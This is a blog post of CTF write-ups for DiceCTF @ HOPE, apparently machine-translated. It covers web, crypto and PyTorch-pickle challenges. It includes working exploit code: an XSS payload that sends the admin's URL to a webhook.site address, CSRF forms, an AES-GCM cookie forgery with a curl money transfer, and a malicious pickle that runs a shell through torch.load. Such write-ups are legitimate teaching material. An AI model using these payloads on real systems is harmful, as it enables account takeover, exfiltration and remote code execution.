DiceCTF @ HOPE WriteUps

發表於
分類於 CTF

This article is automatically translated by LLM, so the translation may be inaccurate or incomplete. If you find any mistake, please let me know.
You can find the original article here .

This time, XxTSJxX and I participated in the DiceCTF @ HOPE competition (essentially redpwnCTF 2022) and achieved a good result.

web

point

package main

import (
	"encoding/json"
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
	"strings"
)

type importantStuff struct {
	Whatpoint string `json:"what_point"`
}

func main() {
	flag, err := os.ReadFile("flag.txt")
	if err != nil {
		panic(err)
	}

	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		switch r.Method {
		case http.MethodGet:
			fmt.Fprint(w, "Hello, world")
			return
		case http.MethodPost:
			body, err := io.ReadAll(r.Body)
			if err != nil {
				fmt.Fprintf(w, "Something went wrong 1")
				return
			}

			if strings.Contains(string(body), "what_point") || strings.Contains(string(body), "\\") {
				fmt.Fprintf(w, "Something went wrong 2")
				return
			}

			var whatpoint importantStuff
			err = json.Unmarshal(body, &whatpoint)
			if err != nil {
				fmt.Fprintf(w, "Something went wrong 3 %s", err)
				return
			}

			if whatpoint.Whatpoint == "that_point" {
				fmt.Fprintf(w, "Congrats! Here is the flag: %s", flag)
				return
			} else {
				fmt.Fprintf(w, "Something went wrong 4 %s", whatpoint.Whatpoint)
				return
			}
		default:
			fmt.Fprint(w, "Method not allowed")
			return
		}
	})

	log.Fatal(http.ListenAndServe(":8081", nil))

}

Here, we need to create a JSON that can be unmarshaled so that whatpoint.Whatpoint == "that_point", but it doesn't allow what_point and \ in the body. In the struct definition, Whatpoint is specified to take the value from the what_point key.

I directly read the json.Unmarshal code and mainly saw this section and found that it also performs case-insensitive matching when comparing keys, so changing one letter to uppercase can bypass it.

> curl 'https://point.mc.ax/' --data '{"what_poinT":"that_point"}'
Congrats! Here is the flag: hope{cA5e_anD_P0iNt_Ar3_1mp0rT4nT}

mk

The challenge has a straightforward https://mk.mc.ax/render?content=asd that renders markdown for you, and it doesn't block HTML, etc., so you can directly inject HTML. However, it has a CSP that prevents direct XSS:

default-src 'self';base-uri 'self';frame-ancestors 'none';img-src 'none';object-src 'none';script-src 'self' 'unsafe-eval';script-src-attr 'none';style-src 'self' 'unsafe-inline'

Looking at the provided files, we know it uses MathJax 2.7.9, so I checked the official Getting Started and found that MathJax is initialized like this:

<script type="text/x-mathjax-config">
MathJax.Hub.Config({
  tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]}
});
</script>
<script type="text/javascript" async src="path-to-mathjax/MathJax.js?config=TeX-AMS_CHTML"></script>

The text/x-mathjax-config looks suspicious, so I modified it to:

<script type="text/x-mathjax-config">
alert(1)
</script>
<script type="text/javascript" async src="/MathJax/MathJax.js?config=TeX-AMS_CHTML"></script>

Then, inserting it into /render?content=... triggered an alert, indicating that MathJax would eval that code. The remaining task was to steal the admin bot's cookie.

Flag: hope{make_sure_to_check_your_dependencies}

payment-pal

This is the best-designed web CTF challenge I've solved so far.

This challenge is quite complex and requires finding various vulnerabilities and chaining them together to solve it.

First, let's look at the admin bot:

// npm install puppeteer

const puppeteer = require("puppeteer");

// change these
const USERNAME = "ADMIN_ACCOUNT";
const PASSWORD = "ADMIN_PASSWORD";
const SITE = "http://paymentpal.localhost";

const visit = async (url) => {
    let browser;
    try {
        browser = await puppeteer.launch({
            headless: 'chrome',
            pipe: true,
            args: [
                "--no-sandbox",
                "--disable-setuid-sandbox",
                "--js-flags=--noexpose_wasm,--jitless",
            ],
            dumpio: true
        });

        let page = await browser.newPage();
        await page.goto(SITE, {
            waitUntil: "networkidle2"
        });

        await page.evaluate((username, password) => {
            document.querySelector("input[name=username]").value = username;
            document.querySelector("input[name=password]").value = password;
            document.querySelector("#login_btn").click();
        }, USERNAME, PASSWORD);
        page.once('dialog', async dialog => {
            await dialog.dismiss();
        });
        await page.waitForNavigation();

        // yeah, this is indeed the payment-pal website :')
        await page.waitForTimeout(1000);

        await page.evaluate(() => {
            document.querySelector("#logout_btn").click();
        });
        await page.waitForTimeout(2000);

        await page.goto(url);
        await page.waitForTimeout(10000);

        await browser.close();
        browser = null;
    } catch (err) {
        console.log(err);
    } finally {
        if (browser) await browser.close();
    }
};

visit("https://yourwebsite/payload");

The process is that the admin logs in, then logs out, and finally visits the specified URL. The login and logout part seems like a NOOP, making it confusing because there are no admin credentials when visiting the URL. So, is there any exploitation opportunity?

The backend uses Express and GraphQL, and the database is just a simple in-memory map in JavaScript:

db.js:

const users = new Map();

const getUser = (name) => users.get(name);
const setUser = (name, data) => users.set(name, data);

(() => {
    const crypto = require("crypto");
    const sha256 = (data) => crypto.createHash('sha256').update(data).digest('hex');

    const username = `admin-` + (process.env.ADMIN_SUFFIX || crypto.randomBytes(8).toString("hex"));
    const password = process.env.ADMIN_PASSWORD || crypto.randomBytes(16).toString("hex");
    setUser(username, Object.freeze({
        username,
        password: sha256(password),
        money: 133742069,
        isAdmin: true,
        contacts: Object.freeze([])
    }));
    console.log(`created account: ${username} with password ${password}`);
})();

module.exports = {
    getUser,
    setUser
};

From auth.js, we know it uses AES-256-GCM to encrypt the username as a token and stores it in the session cookie:

const crypto = require("crypto");

const db = require("./db.js");

const KEY = crypto.randomBytes(32);

const encrypt = (data) => {
  const iv = Buffer.from(crypto.randomBytes(16));
  const cipher = crypto.createCipheriv('aes-256-gcm', KEY, iv);
  let enc = cipher.update(data, 'utf8', 'base64');
  enc += cipher.final('base64');
  return [enc, iv.toString('base64'), cipher.getAuthTag().toString('base64')].join(".");
};

const decrypt = (data) => {
  try {
    const [enc, iv, authTag] = data.split(".").map(d => Buffer.from(d, 'base64'));
    const decipher = crypto.createDecipheriv('aes-256-gcm', KEY, iv);
    decipher.setAuthTag(authTag);
    let dec = decipher.update(enc, 'base64', 'utf8');
    return dec;
  }
  catch(err) {
    return null;
  }
};

const getUser = (req) => {
  const session = req.cookies.session;
  if(!session) {
    throw new Error("You are not logged in")
  }

  const username = decrypt(session);
  if(!username) {
    throw new Error("You are not logged in");
  }
  
  let user = db.getUser(username);
  if(!user) {
    throw new Error("You are not logged in")
  }

  return user;
};

const setUser = (res, username) => {
  res.cookie("session", encrypt(username));
};

module.exports = { getUser, setUser };

We know that AES-GCM is authenticated encryption, so we shouldn't be able to modify the session, right? However, there's a big problem in this code due to incorrect API usage. Comparing it with a Google example using node.js crypto API with aes-256-gcm, we notice that both use cipher.final() during encryption, but auth.js doesn't use decipher.final() during decryption. Testing reveals that modifying the authTag still allows successful decryption because decipher.final() is needed to check the authTag. Without this check, AES-GCM is equivalent to AES-CTR, allowing arbitrary plaintext flipping.

Example:

const xor = (a, b) => {
	const buf = Buffer.alloc(a.length)
	for (let i = 0; i < a.length; i++) {
		buf[i] = a[i] ^ b[i]
	}
	return buf
}

const [enc, iv, auth] = encrypt('guest').split('.')
const target = Buffer.from('admin')
const plain = Buffer.from('guest')
const enc2 = xor(Buffer.from(enc, 'base64'), xor(target, plain)).toString('base64')
console.log(decrypt([enc, iv, auth].join('.')))  // guest
console.log(decrypt([enc2, iv, auth].join('.')))  // admin

This means the decrypted username from the token can be arbitrarily modified, but we still need to know the admin username (admin-?) to get the admin account.

The goal now shifts from XSS and using GraphQL to transfer money to our account to XSS and obtaining the admin username, making the admin bot's logout less confusing. Assuming we have XSS, we can use history.go(-4) to return to the original page, and if XSS is obtained in a new tab, we can use window.opener.location.href to get the URL. (Upon successful login, it redirects to /?message=logged in as ${username}, so the username is in the URL.)

To achieve XSS, we need to read the client-side script.js. Here are the important parts:

const $ = document.querySelector.bind(document); // imagine using jQuery...

const DENYLIST = ["__proto__", "constructor", "prototype"]; // no
const parseQs = () => {
  let obj = {};
  let pairs = location.search.slice(1).split('&').filter(Boolean);
  for (let i = 0; i < pairs.length; i++) {
    if (DENYLIST.some(key => pairs[i].includes(key))) continue;

    let parts = pairs[i].split('=');
    let m;
    if (m = /(\w+)\[(\w+)\]/.exec(decodeURIComponent(parts[0]))) {
      obj[m[1]] = obj[m[1]] || [];
      obj[m[1]][m[2]] = decodeURIComponent(parts[1]);
    } else {
      obj[decodeURIComponent(parts[0])] = decodeURIComponent(parts[1]);
    }
  }

  history.pushState(null, null, location.pathname);
  return obj;
};
let qs = parseQs();

const graphql = async (query, variables) => {
  let r;
  if (variables) {
    r = await fetch("/graphql", {
      method: "POST",
      credentials: "same-origin",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({
        query,
        variables
      })
    });
  } else {
    r = await fetch("/graphql?query=" + encodeURIComponent(query), {
      credentials: "same-origin"
    });
  }
  return await r.json();
};

window.onload = async () => {
  if (qs.message) {
    alert(qs.message);
    await new Promise(r => setTimeout(r, 500));
  }
  qs = null;

  let res = await graphql(`query { info { money, isAdmin } }`);
  if (res.errors) {
    // not logged in
    $("#anonymous").style.display = "block";
  } else {
    // welcome!
    let { money, isAdmin } = res.data.info;
    $("#user").style.display = "block";
    $("#money").innerText = `Money: $${money}`;

    if (isAdmin) {
      // enable WIP contacts feature
      let res = await graphql(`query { info { contacts } }`);
      if (res.errors || !res.data.info.contacts) return;
      let html = `<h3>contacts:</h3><ol>`;
      res.data.info.contacts.forEach(user =>
        html += `<li onclick="transferToUser('${user}')" style="cursor:pointer">${user}</li>`
      );
      html += `</ol>`;
      $("#contacts").innerHTML = html;
    }
  }
};

First, parseQs checks for __proto__, constructor, and prototype, but it decodes the URI component afterward, making it easy to bypass the check and perform prototype pollution. For example, the following URL makes Object.prototype.peko === 'miko' true:

https://payment-pal.mc.ax/?__%70roto__%5Bpeko%5D=miko

However, reading further, there doesn't seem to be any prototype pollution gadget available. The most suspicious part is isAdmin, where $("#contacts").innerHTML = html; might allow XSS, but await graphql('query { info { money, isAdmin } }') returns {"data":{"info":{"money":0,"isAdmin":false}}} for a regular account, so polluting Object.prototype.isAdmin is useless.

I was reminded of a breakthrough from solving SEETF 2022 - Charlotte's Web, where I learned that prototype pollution can affect certain browser APIs, including fetch. For example, the following code successfully queries in both Chromium and Firefox:

Object.prototype.body = JSON.stringify({ query: 'query { info { username } }' })
await fetch("/graphql", {
  method: "POST",
  credentials: "same-origin",
  headers: {
    "Content-Type": "application/json"
  }
}).then(r => r.json());

However, this prototype pollution can only pollute one level, so we can't pollute headers, making it impossible to modify method and body. Checking fetch() options, I found an interesting cache option. One option is cache: 'force-cache', which forces the browser to use cached data if available. (You can see if it's cached in the Network tab of devtools under Fulfilled by.)

Since the admin bot logs in and waits for a second before logging out, the responses for query { info { money, isAdmin } } and query { info { contacts } } should be cached. Polluting Object.prototype.cache = 'force-cache' makes the browser use the cached response, so isAdmin will be true for the admin bot!

However, the response for query { info { contacts } } will also be cached. To control contacts for XSS, we need to purge the cache. Testing revealed that directly GETting the query URL doesn't work, but CSRF POSTing the URL clears the contacts cache.

The rest is simpler. Since isAdmin will make the browser follow the if branch, controlling the contacts' username allows HTML injection for XSS. To control contacts, we can use CSRF to make the admin bot login to any new account, and since we control the account, we can control its contacts (or register and then CSRF addContact). This method is a common Self-XSS + CSRF = XSS.

However, CSRFing GraphQL reveals that GET /graphql?query=mutation { ... } fails because it requires POST. Although CSRF can't control Content-Type to application/json, testing shows that POST /graphql?query=mutation { ... } works, so JSON in the body isn't necessary.

Complete payload to steal the admin username using XSS:

index.html:

<script>
    window.open('/main.html' + location.hash)
    history.go(-3)
</script>

This opens the main main.html and uses history.go(-3) to return to the original https://payment-pal.mc.ax/, making it easier for main.html to control the tab when it gets XSS. The location.hash is related to main.html.

main.html:

<script>
	const base = ['http://localhost:8080', 'https://payment-pal.mc.ax'][location.hash.slice(1)]
	window.onload = async () => {
		w =  window.open('/nocache.html' + location.hash)
		await new Promise(r => setTimeout(r, 1000))
		w.close()
		w = window.open('/csrf_register.html' + location.hash)
		await new Promise(r => setTimeout(r, 1000))
		w.close()
		w = window.open('/csrf_addcontact.html' + location.hash)
		await new Promise(r => setTimeout(r, 1000))
		w.close()
		location = `${base}/?__%70roto__%5Bcache%5D=force-cache`
	}
</script>

Using location.hash to select the base URL is just for convenience during localhost testing. The main part opens three pages in sequence: clearing the contacts cache, CSRF registering, and CSRF adding contact, then redirects itself to payment-pal while polluting cache: 'force-cache'.

nocache.html:

<script>
	const base = ['http://localhost:8080', 'https://payment-pal.mc.ax'][location.hash.slice(1)]
	window.onload = async () => {
		const u = `${base}/graphql?query=query%20%7B%20info%20%7B%20contacts%20%7D%20%7D`
		const f = document.createElement('form')
		f.method = 'POST'
		f.action = u
		document.body.appendChild(f)
		f.submit()
	}
</script>

This POSTs the contacts query to clear the cache.

csrf_register.html:

<script>
	const base = ['http://localhost:8080', 'https://payment-pal.mc.ax'][location.hash.slice(1)]
	window.onload = async () => {
        const user = Math.random().toString(36)
        const pass = Math.random().toString(36)
		const u =
			`${base}/graphql?query=` +
			encodeURIComponent(`mutation { register(username: ${JSON.stringify(user)}, password: ${JSON.stringify(pass)}) { username } }`)
		const f = document.createElement('form')
		f.method = 'POST'
		f.action = u
		document.body.appendChild(f)
		f.submit()
	}
</script>

This CSRFs a random register account, which is the Self-XSS account.

csrf_addcontact.html:

<script>
	const base = ['http://localhost:8080', 'https://payment-pal.mc.ax'][location.hash.slice(1)]
	window.onload = async () => {
		const xss = `<img src onerror="window.opener.history.go(-2);setTimeout(()=>{
			fetch('https://webhook.site/6cc46cc8-91a2-4af0-ad21-4d172e924df3?xss='+encodeURIComponent(window.opener.location.href), {mode:'no-cors'})
		},1000)">`
		const u =
			`${base}/graphql?query=` +
			encodeURIComponent(`mutation { addContact(username: ${JSON.stringify(xss)}){ username } }`)
		const f = document.createElement('form')
		f.method = 'POST'
		f.action = u
		document.body.appendChild(f)
		f.submit()
	}
</script>

This CSRFs addContact to insert the XSS payload into the DB. The XSS payload moves the original login + logout + index.html tab history forward by two, then accesses its href to get the page URL. On the remote instance, I received:

https://payment-pal.mc.ax/?message=logged%20in%20as%20admin-dicegang_pp_user

So, the admin username is admin-dicegang_pp_user. Using the AES-GCM bug, we can generate a token with the same username:

// first register an account with username aaaaaaaaaaaaaaaaaaaaaa, and grab its token
const [enc, iv, auth] = 'JOqjWwyEnD+62ER1kFLOaS+Uz2f4Xg==.tx6orPNKYjUQ2VpYf9GtKA==.vDV0+uV+9dqXwsAWNYywNA=='.split('.')
const target = Buffer.from('admin-dicegang_pp_user')
const plain = Buffer.from('a'.repeat(22))
const enc2 = xor(Buffer.from(enc, 'base64'), xor(target, plain)).toString('base64')
console.log([enc2, iv, auth].join('.'))

Then, transfer money to our account:

curl 'https://payment-pal.mc.ax/graphql' -G --data-urlencode 'query=mutation { transfer(recipient: "pekomiko35", amount: 133742069) { username } }' -H 'Cookie: session=JO+vUwPImTe43EJ1n1TweD6q23X8TQ==.tx6orPNKYjUQ2VpYf9GtKA==.vDV0+uV+9dqXwsAWNYywNA==' -X POST

Finally, query query { flag } under our account to finish.

Flag: hope{pp=payment-pal=prototype-pollution!!!}

Author writeup: DiceCTF @ HOPE - web/payment-pal writeup

crypto

reverse-rsa

#!/usr/local/bin/python

import re
from Crypto.Util.number import isPrime, GCD

flag_regex = rb"hope{[a-zA-Z0-9_\-]+}"

with open("ciphertext.txt", "r") as f:
	c = int(f.read(), 10)

print(f"Welcome to reverse RSA! The encrypted flag is {c}.  Please provide the private key.")

p = int(input("p: "), 10)
q = int(input("q: "), 10)
e = int(input("e: "), 10)

N = p * q
phi = (p-1) * (q-1)

if (p < 3) or not isPrime(p) or (q < 3) or not isPrime(q) or (e < 2) or (e > phi) or GCD(p,q) > 1 or GCD(e, phi) != 1:
	print("Invalid private key")
	exit()


d = pow(e, -1, phi)
m = pow(c, d, N)

m = int.to_bytes(m, 256, 'little')
m = m.strip(b"\x00")

if re.fullmatch(flag_regex, m) is not None:
	print("Clearly, you must already know the flag!")

	with open('flag.txt','rb') as f:
		flag = f.read()
		print(flag.decode())

else:
	print("hack harder")

This challenge involves an unknown RSA public encryption of the flag, denoted as cc, and we need to provide another public key such that mcd(modn)m' \equiv c^d \pmod{n} matches a hope{[a-zA-Z0-9_\-]+} regex.

The solution is to choose any mm' that matches the regex, like hope{a} (pay attention to endianness), and then the problem becomes a discrete log problem. Therefore, we need p1,q1p-1,q-1 to be smooth enough, then solve the dlog for each and use CRT to find the required ee.

from Crypto.Util.number import *

c = 7146993245951509380139759140890681816862856635262037632915667109712467317954902955151177421740994622238561522690931235839733579166121631742096762557444153806131985279962646477997889661633938981817306610901055296705982494607773446985300816341071922739788638126631520234249358834592814880445497817389957300553660499631838091201561728727996660871094966330045071879490277901216751327226984526095495604592577841120425249633624459211547984305731778854596177467026282357094690700361174790351699376317810120824316300666128090632100150965101285647544696152528364989155735157261219949095760495520390692941417167332814540685297
m = bytes_to_long(b"hope{a}"[::-1])


def gen():
    while True:
        b = 64
        n = 4
        ps = [getPrime(b // n) for _ in range(n)]
        p = 2 * product(ps) + 1
        if isPrime(p):
            return p


while True:
    try:
        p = gen()
        q = gen()
        dp = GF(p)(m).log(c)
        dq = GF(q)(m).log(c)
        d = crt([ZZ(dp), ZZ(dq)], [p - 1, q - 1])
        e = inverse_mod(d, (p - 1) * (q - 1))
        m = power_mod(c, d, p * q)
    except:
        continue
    print(p)
    print(q)
    print(e)
    print(int.to_bytes(int(m), 256, 'little'))
    break
"""
18237507977115134399
13539415005905881139
201049869065984997914383873658228289079
"""
# hope{successful_decryption_doesnt_mean_correct_decryption_0363f29466b883edd763dc311716194d37dff5cd93cd4f1b4ac46152f4f9}

small-fortune

from Crypto.Util.number import *
from gmpy2 import legendre

flag = bytes_to_long(open("flag.txt", "rb").read())

p, q = getPrime(256), getPrime(256)
n = p * q

x = getRandomRange(0, n)
while legendre(x, p) != -1 or legendre(x, q) != -1:
    x = getRandomRange(0, n)

def gm_encrypt(msg, n, x):
    y = getRandomRange(0, n)
    enc = []
    while msg:
        bit = msg & 1
        msg >>= 1
        enc.append((pow(y, 2) * pow(x, bit)) % n)
        y += getRandomRange(1, 2**48)
    return enc

print("n =", n)
print("x =", x)
print("enc =", gm_encrypt(flag, n, x))

First, we have a 256-bit n=pqn=pq and a random number xx (the quadratic residue part seems unnecessary (?)) as the public key. The encryption process generates an unknown random number yy, then encrypts bit by bit:

ciyi2xbi(modn)c_i \equiv y_i^2 x^{b_i} \pmod{n}

where y0=y,yi=yi1+diy_0=y, y_i=y_{i-1}+d_i and did_i is a random number within 2482^{48}.

Assuming the flag.txt contains a flag in the format hope{...} without a newline at the end, we know b0=1,b1=0b_0=1, b_1=0. From this, we can derive two equations:

c0y2xb0y2x(modn)c1(y+d1)2xb0(y+d1)2(modn)\begin{aligned} c_0 &\equiv y^2 x^{b_0} \equiv y^2 x \pmod{n} \\ c_1 &\equiv (y+d_1)^2 x^{b_0} \equiv (y+d_1)^2 \pmod{n} \end{aligned}

Rearranging gives two polynomials f(y,d1),g(y,d1)f(y,d_1), g(y,d_1). Using the resultant, we get h=Resy(f,g)h = \operatorname{Res}_y(f,g), a fourth-degree polynomial in d1d_1. Since 48×4<25648 \times 4 < 256, we can use Coppersmith to find d1d_1. Substituting d1d_1 back into f,gf,g gives two polynomials in yy, and their gcd reveals yy.

With yy known, the rest is easier. Assuming we don't know b1b_1 (or d1d_1), the following two equations are possible:

c1(y+d1)2x0(modn)c1(y+d1)2x1(modn)\begin{aligned} c_1 &\equiv (y+d_1)^2 x^0 \pmod{n} \\ c_1 &\equiv (y+d_1)^2 x^1 \pmod{n} \end{aligned}

Here, only yy is known, and d1d_1 is small, so we can use Coppersmith on both polynomials to see which has a root less than 2482^{48}, revealing whether b1b_1 is 00 or 11. The remaining bits can be deduced similarly.

with open("output.txt") as f:
    exec(f.read())


def resultant(f1, f2, var):
    return f1.sylvester_matrix(f2, var).det()


# assuming ending with `}` = 01111101
P = PolynomialRing(Zmod(n), "y,d")
y, d = P.gens()
f = y ^ 2 * x - enc[0]
g = (y + d) ^ 2 - enc[1]
h = resultant(f, g, y).univariate_polynomial()
d = h.monic().small_roots()[1]


P = PolynomialRing(Zmod(n), "y")
y = P.gen()
f = y ^ 2 * x - enc[0]
g = (y + d) ^ 2 - enc[1]
while g:
    f, g = g, f % g
y = -f[0] / f[1]
assert y ^ 2 * x == enc[0]


bits = [1]
for e in enc[1:]:
    P = PolynomialRing(Zmod(n), "d")
    d = P.gen()
    f = (y + d) ^ 2 * x - e
    g = (y + d) ^ 2 - e
    rs1 = f.monic().small_roots()
    rs2 = g.monic().small_roots()
    if rs1:
        bits += [1]
        d = rs1[0]
    elif rs2:
        bits += [0]
        d = rs2[0]
    else:
        raise Exception("nope")
    y += d
    print(y)
    print(bits)
bits += [0]

from pwn import unbits

print(unbits(bits[::-1]))
# hope{r4nd0m_sh0uld_b3_truly_r4nd0m_3v3ry_t1m3_sh0uld_1t_n0t?}

Note: The nn in this challenge is only 512 bits, so using FaaS to factor it and then using Rabin decryption to find yy might be possible.

misc

arson

This challenge is a broken version of reckless arson, but I initially found the intended solution, so the unintended one was found later.

#!/usr/local/bin/python

import torch
import pickle
import base64
import secrets
import os

class UnpicklerWrapper:
    def find_class(self, module, name):
        if module+"."+name in (
            "builtins.set",
            "collections.OrderedDict",
            "torch.nn.modules.activation.LogSigmoid",
            "torch.nn.modules.activation.LogSoftmax",
            "torch.nn.modules.activation.ReLU",
            "torch.nn.modules.activation.Sigmoid",
            "torch.nn.modules.activation.Softmax",
            "torch.nn.modules.batchnorm.BatchNorm1d",
            "torch.nn.modules.batchnorm.BatchNorm2d",
            "torch.nn.modules.batchnorm.BatchNorm3d",
            "torch.nn.modules.conv.Conv1d",
            "torch.nn.modules.conv.Conv2d",
            "torch.nn.modules.conv.ConvTranspose1d",
            "torch.nn.modules.conv.ConvTranspose2d",
            "torch.nn.modules.dropout.Dropout2d",
            "torch.nn.modules.dropout.Dropout3d",
            "torch.nn.modules.flatten.Flatten",
            "torch.nn.modules.linear.Linear",
            "torch.nn.modules.loss.BCELoss",
            "torch.nn.modules.loss.BCEWithLogitsLoss",
            "torch.nn.modules.loss.CrossEntropyLoss",
            "torch.nn.modules.loss.L1Loss",
            "torch.nn.modules.loss.MSELoss",
            "torch.nn.modules.pooling.AvgPool2d",
            "torch.nn.modules.pooling.MaxPool2d",
            "torch._utils._rebuild_parameter",
            "torch._utils._rebuild_tensor_v2",
            "torch.Size",
            "torch.BFloat16Storage",
            "torch.BoolStorage",
            "torch.CharStorage",
            "torch.ComplexDoubleStorage",
            "torch.ComplexFloatStorage",
            "torch.HalfStorage",
            "torch.IntStorage",
            "torch.LongStorage",
            "torch.QInt32Storage",
            "torch.QInt8Storage",
            "torch.QUInt8Storage",
            "torch.ShortStorage",
            "torch.storage._StorageBase",
            "torch.ByteStorage",
            "torch.DoubleStorage",
            "torch.FloatStorage",
            "torch._C.HalfStorageBase",
            "torch._C.QInt32StorageBase",
            "torch._C.QInt8StorageBase",
            "torch.storage._TypedStorage",
        ):
            return super().find_class(module, name)
        else:
            raise Exception("Hacking detected!")

# replace find_class with our safe one
_load_co_consts = list(torch.serialization._load.__code__.co_consts)
unpickler_co_consts = list(_load_co_consts[7].co_consts)
unpickler_co_consts[1] = UnpicklerWrapper.find_class.__code__
_load_co_consts[7] = _load_co_consts[7].replace(co_consts=tuple(unpickler_co_consts))
torch.serialization._load.__code__ = torch.serialization._load.__code__.replace(co_consts=tuple(_load_co_consts))
_legacy_load_co_consts = list(torch.serialization._legacy_load.__code__.co_consts)
unpickler_co_consts = list(_legacy_load_co_consts[7].co_consts)
unpickler_co_consts[1] = UnpicklerWrapper.find_class.__code__
_legacy_load_co_consts[7] = _legacy_load_co_consts[7].replace(co_consts=tuple(unpickler_co_consts))
torch.serialization._legacy_load.__code__ = torch.serialization._legacy_load.__code__.replace(co_consts=tuple(_legacy_load_co_consts))

try:
    with open(filename := "/tmp/"+secrets.token_hex(), "wb") as f:
        data = base64.b64decode(input("Enter base64-encoded model: "))
        if len(data) > 1000000: raise Exception("Model too big")
        f.write(data)

    model = torch.load(filename)

    # Machine learning is magic!
    model.solve_world_hunger()
finally:
    os.remove(filename)

We need to provide a fake model to torch.load for RCE. First, read the torch.load code (in serialization.py). It has new and old formats implemented in _load and _legacy_load, respectively, and this unintended solution involves _legacy_load.

We see UnpicklerWrapper, whose find_class can easily achieve RCE, but arson.py patches co_consts to modify UnpicklerWrapper.find_class to a restricted version, preventing direct RCE...?

Reading further, we see magic_number = pickle_module.load(f, **pickle_load_args), where pickle_module is Python's pickle. So, providing a simple os.system('sh') pickle achieves RCE.

reckless arson

This challenge is a fixed version of the previous one, simplifying _legacy_load to None:

71,75c71,73
< _legacy_load_co_consts = list(torch.serialization._legacy_load.__code__.co_consts)
< unpickler_co_consts = list(_legacy_load_co_consts[7].co_consts)
< unpickler_co_consts[1] = UnpicklerWrapper.find_class.__code__
< _legacy_load_co_consts[7] = _legacy_load_co_consts[7].replace(co_consts=tuple(unpickler_co_consts))
< torch.serialization._legacy_load.__code__ = torch.serialization._legacy_load.__code__.replace(co_consts=tuple(_legacy_load_co_consts))
---
> 
> # old stuff is dangerous
> torch.serialization._legacy_load = None

So, we can only use the new _load (source code here), which only uses UnpicklerWrapper to load the pickle. Its co_consts are patched, making find_class the fixed version, so no simple unintended solution is possible. We need to find a usable class from the allowed list.

Reading some code, we find torch.storage._TypedStorage interesting because its __new__ has a code path that executes eval():

                return _TypedStorage(
                    *args,
                    dtype=cls.dtype,
                    device='cuda' if eval(cls.__module__) is torch.cuda else 'cpu')

PS: This eval was patched a few days before the competition, but the default pip version wasn't fixed yet.

Reading the code, we see that entering that path requires cls != _LegacyStorage and cls != _LegacyStorage len(args) == 0, then it eval(cls.__module__). Researching storage-related code, we find _LegacyStorage is a subclass of _TypedStorage, and classes like torch.FloatStorage inherit from _LegacyStorage. To pass the cls check, we need to use classes like torch.FloatStorage, torch.ByteStorage, etc.

Testing torch.FloatStorage() confirms it enters the eval path, so modifying torch.FloatStorage.__module__ achieves code execution.

In pickle, we know the BUILD opcode (source) modifies attributes based on the state format, using either __dict__ or setattr. However, a class __dict__ is a mappingproxy, which doesn't support direct modification:

>>> import torch
>>> torch.FloatStorage.__dict__['__module__'] = 'asd'
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'mappingproxy' object does not support item assignment

But using setattr works:

>>> import torch
>>> setattr(torch.FloatStorage, '__module__', 'asd')
>>> torch.FloatStorage.__module__
'asd'

So, modifying __module__ requires using the setattr version. This is important because I used splitline/Pickora to simplify generating pickle bytecode, and it defaults to modifying attributes using BUILD with __dict__ (source). So, I added a BUILD macro to use:

        def macro_build(args):
            assert(len(args) == 2)
            self.bytecode += pickle.MARK
            self.traverse(args[0])
            self.traverse(args[1])
            self.bytecode += b'b'
        macro_handler['BUILD'] = macro_build

I should have modified the attribute handling code directly, but I later found out Pickora previously used setattr, which was patched.

Using the patched Pickora to compile the following code generates the RCE payload:

from torch import FloatStorage
BUILD(FloatStorage, (None, {"__module__": "__import__('os').system('sh')"}))
FloatStorage()

Here's the complete code:

import sys

sys.path.insert(0, "./Pickora")
from compiler import Compiler
import torch
import pickle
import base64
import secrets
import os
import zipfile


class UnpicklerWrapper:
    def find_class(self, module, name):
        if module + "." + name in (
            "builtins.set",
            "collections.OrderedDict",
            "torch.nn.modules.activation.LogSigmoid",
            "torch.nn.modules.activation.LogSoftmax",
            "torch.nn.modules.activation.ReLU",
            "torch.nn.modules.activation.Sigmoid",
            "torch.nn.modules.activation.Softmax",
            "torch.nn.modules.batchnorm.BatchNorm1d",
            "torch.nn.modules.batchnorm.BatchNorm2d",
            "torch.nn.modules.batchnorm.BatchNorm3d",
            "torch.nn.modules.conv.Conv1d",
            "torch.nn.modules.conv.Conv2d",
            "torch.nn.modules.conv.ConvTranspose1d",
            "torch.nn.modules.conv.ConvTranspose2d",
            "torch.nn.modules.dropout.Dropout2d",
            "torch.nn.modules.dropout.Dropout3d",
            "torch.nn.modules.flatten.Flatten",
            "torch.nn.modules.linear.Linear",
            "torch.nn.modules.loss.BCELoss",
            "torch.nn.modules.loss.BCEWithLogitsLoss",
            "torch.nn.modules.loss.CrossEntropyLoss",
            "torch.nn.modules.loss.L1Loss",
            "torch.nn.modules.loss.MSELoss",
            "torch.nn.modules.pooling.AvgPool2d",
            "torch.nn.modules.pooling.MaxPool2d",
            "torch._utils._rebuild_parameter",
            "torch._utils._rebuild_tensor_v2",
            "torch.Size",
            "torch.BFloat16Storage",
            "torch.BoolStorage",
            "torch.CharStorage",
            "torch.ComplexDoubleStorage",
            "torch.ComplexFloatStorage",
            "torch.HalfStorage",
            "torch.IntStorage",
            "torch.LongStorage",
            "torch.QInt32Storage",
            "torch.QInt8Storage",
            "torch.QUInt8Storage",
            "torch.ShortStorage",
            "torch.storage._StorageBase",
            "torch.ByteStorage",
            "torch.DoubleStorage",
            "torch.FloatStorage",
            "torch._C.HalfStorageBase",
            "torch._C.QInt32StorageBase",
            "torch._C.QInt8StorageBase",
            "torch.storage._TypedStorage",
        ):
            return super().find_class(module, name)
        else:
            raise Exception("Hacking detected!")


# replace find_class with our safe one
_load_co_consts = list(torch.serialization._load.__code__.co_consts)
unpickler_co_consts = list(_load_co_consts[7].co_consts)
unpickler_co_consts[1] = UnpicklerWrapper.find_class.__code__
_load_co_consts[7] = _load_co_consts[7].replace(co_consts=tuple(unpickler_co_consts))
torch.serialization._load.__code__ = torch.serialization._load.__code__.replace(co_consts=tuple(_load_co_consts))

# old stuff is dangerous
torch.serialization._legacy_load = None

pkl = Compiler(
    source="""
from torch import FloatStorage
BUILD(FloatStorage,(None,{"__module__": "__import__('os').system('sh')"}))
FloatStorage()
"""
).compile()
with zipfile.ZipFile("out", "w", zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("archive/version", b"3")
    zf.writestr("archive/data.pkl", pkl)

model = torch.load("out")
print(model)
